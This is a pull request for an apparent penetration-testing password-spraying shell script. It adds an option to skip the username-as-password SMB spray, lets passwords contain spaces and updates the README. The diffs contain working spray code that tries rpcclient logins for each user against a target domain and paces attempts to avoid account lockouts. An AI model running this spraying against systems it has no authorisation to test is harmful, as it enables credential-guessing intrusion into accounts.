### PR TITLE
SMB Spray - Skip username%username spray

### DIFF
--- a/README.md
+++ b/README.md
@@ -34,6 +34,7 @@ per lockout period, lockout period length and the domain must be provided
 ```
 Useage: spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
 Example: spray.sh -smb 192.168.0.1 users.txt passwords.txt 1 35 SPIDERLABS
+Optionally Skip Username%Username Spray: spray.sh -smb 192.168.0.1 users.txt passwords.txt 1 35 SPIDERLABS skipuu
 ```
 
 ### OWA

--- a/spray.sh
+++ b/spray.sh
@@ -5,8 +5,9 @@ echo -e "\nSpray 2.1 the Password Sprayer by Jacob Wilkin(Greenwolf)\n"
 if [ $# -eq 0 ] || [ "$1" == "-help" ] || [ "$1" == "-h" ] || [ "$1" == "--help" ] ; then
     echo "This script will password spray a target over a period of time"
     echo "It requires password policy as input so accounts are not locked out"
-    echo "Useage: spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <Domain>"
+    echo "Useage: spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <Domain> <OptionalSkipUsernameUsernameSpray>"
     echo -e "Example: spray.sh -smb 192.168.0.1 users.txt passwords.txt 1 35 CORPORATION\n"
+    echo -e "Example Skipping Username:Username Spray: spray.sh -smb 192.168.0.1 users.txt passwords.txt 1 35 CORPORATION NOUSERUSER\n"
 
     echo "To password spray an OWA portal, a file must be created of the POST request with Username: sprayuser@domain.com, and Password: spraypassword"
     echo "Useage: spray.sh -owa <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <RequestFile>"

--- a/spray.sh
+++ b/spray.sh
@@ -123,7 +123,6 @@ if [ "$1" == "-smb" ] || [ "$1" == "--smb" ] || [ "$1" == "smb" ] ; then
 
     #Initial spray for same username as password
     if [ "$nouseruser" == "" ] ; then
-	echo $nouseruser
         time=$(date +%H:%M:%S)
         echo "$time Spraying with password: Users Username"
         for u in $(cat $userslist); do 
@@ -138,7 +137,7 @@ if [ "$1" == "-smb" ] || [ "$1" == "--smb" ] || [ "$1" == "smb" ] ; then
     fi
 
     #Then start on list
-    for password in $(cat $passwordlist); do
+    while read password; do
         time=$(date +%H:%M:%S)
     	echo "$time Spraying with password: $password"
     	for u in $(cat $userslist); do 
@@ -156,7 +155,7 @@ if [ "$1" == "-smb" ] || [ "$1" == "--smb" ] || [ "$1" == "smb" ] ; then
     		counter=0
     		sleep $lockoutduration
     	fi
-    done
+    done < $passwordlist
     exit 0
 fi
 

--- a/spray.sh
+++ b/spray.sh
@@ -122,7 +122,8 @@ if [ "$1" == "-smb" ] || [ "$1" == "--smb" ] || [ "$1" == "smb" ] ; then
     touch logs/spray-logs.txt
 
     #Initial spray for same username as password
-    if [ "$nousersuer" == "" ] ; then
+    if [ "$nouseruser" == "" ] ; then
+	echo $nouseruser
         time=$(date +%H:%M:%S)
         echo "$time Spraying with password: Users Username"
         for u in $(cat $userslist); do 

--- a/spray.sh
+++ b/spray.sh
@@ -110,6 +110,7 @@ if [ "$1" == "-smb" ] || [ "$1" == "--smb" ] || [ "$1" == "smb" ] ; then
     mkdir -p logs
     set +H
     domain=$7
+    nouseruser=$8
     target=$2
     cp $3 logs/username-removed-successes.txt
     userslist="logs/username-removed-successes.txt"
@@ -120,16 +121,18 @@ if [ "$1" == "-smb" ] || [ "$1" == "--smb" ] || [ "$1" == "smb" ] ; then
     touch logs/spray-logs.txt
 
     #Initial spray for same username as password
-    time=$(date +%H:%M:%S)
-    echo "$time Spraying with password: Users Username"
-    for u in $(cat $userslist); do 
-    	(echo -n "[*] user $u%$u " && rpcclient -U "$domain/$u%$u" -c "getusername;quit" $target) >> logs/spray-logs.txt
-    done
-    cat logs/spray-logs.txt | grep -v "Cannot"
-    counter=$(($counter + 1))
-    if [ $counter -eq $lockout ] ; then
-    	counter=0
-    	sleep $lockoutduration
+    if [ "$nousersuer" == "" ] ; then
+        time=$(date +%H:%M:%S)
+        echo "$time Spraying with password: Users Username"
+        for u in $(cat $userslist); do 
+        	(echo -n "[*] user $u%$u " && rpcclient -U "$domain/$u%$u" -c "getusername;quit" $target) >> logs/spray-logs.txt
+        done
+        cat logs/spray-logs.txt | grep -v "Cannot"
+        counter=$(($counter + 1))
+        if [ $counter -eq $lockout ] ; then
+        	counter=0
+        	sleep $lockoutduration
+	fi
     fi
 
     #Then start on list


### PR DESCRIPTION
HI! I thought I might be able to contribute a little bit. I've done three things:

1) Allow skipping of the username%username spray for SMB
2) Changed the loop in SMB to permit passwords that contain spaces
3) Update the Readme

Please feel free to take any or all of it as you think is useful! Hopefully I've done more good than harm here, I'm definitely new at this. :) Great project!